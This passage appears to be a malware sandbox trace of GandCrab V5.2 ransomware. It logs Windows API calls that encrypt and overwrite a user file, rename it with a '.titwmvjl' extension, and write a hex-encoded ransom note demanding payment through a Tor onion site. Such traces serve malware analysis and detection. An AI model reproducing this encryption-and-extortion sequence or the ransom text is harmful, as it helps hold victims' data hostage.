GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0072.747] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0072.748] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0072.748] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.748] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.748] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.748] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.748] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0072.748] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0072.749] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0072.749] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0072.749] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0072.749] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.749] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.749] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.749] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.749] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0072.750] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.750] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5036f8) returned 1 [0072.750] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.750] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0072.750] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.751] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0072.751] GetLastError () returned 0x0 [0072.751] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.751] CryptDestroyKey (hKey=0x5036f8) returned 1 [0072.751] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.751] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.751] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.751] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0072.752] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.752] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503238) returned 1 [0072.752] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.752] CryptGetKeyParam (in: hKey=0x503238, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0072.752] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.752] CryptEncrypt (in: hKey=0x503238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0072.752] GetLastError () returned 0x0 [0072.752] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.753] CryptDestroyKey (hKey=0x503238) returned 1 [0072.753] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.753] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.753] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0072.753] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0072.754] ReadFile (in: hFile=0x2c4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ecb4*=0x9362, lpOverlapped=0x0) returned 1 [0072.760] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xffff6c9e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.760] WriteFile (in: hFile=0x2c4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x9362, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ec98*=0x9362, lpOverlapped=0x0) returned 1 [0072.763] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.763] WriteFile (in: hFile=0x2c4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0072.764] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.768] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.768] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.769] CloseHandle (hObject=0x2c4) returned 1 [0072.770] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\mso1033.acl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\mso1033.acl.titwmvjl"), dwFlags=0x1) returned 1 [0072.771] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.771] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.772] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0072.772] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0072.772] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\", lpString2="Recent" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent" [0072.772] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\" [0072.772] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0072.772] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.772] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.772] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.773] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.773] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.773] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.773] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.773] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.773] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.773] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.774] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\\\TITWMVJL-DECRYPT.txt") returned 83 [0072.774] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\recent\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0072.780] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x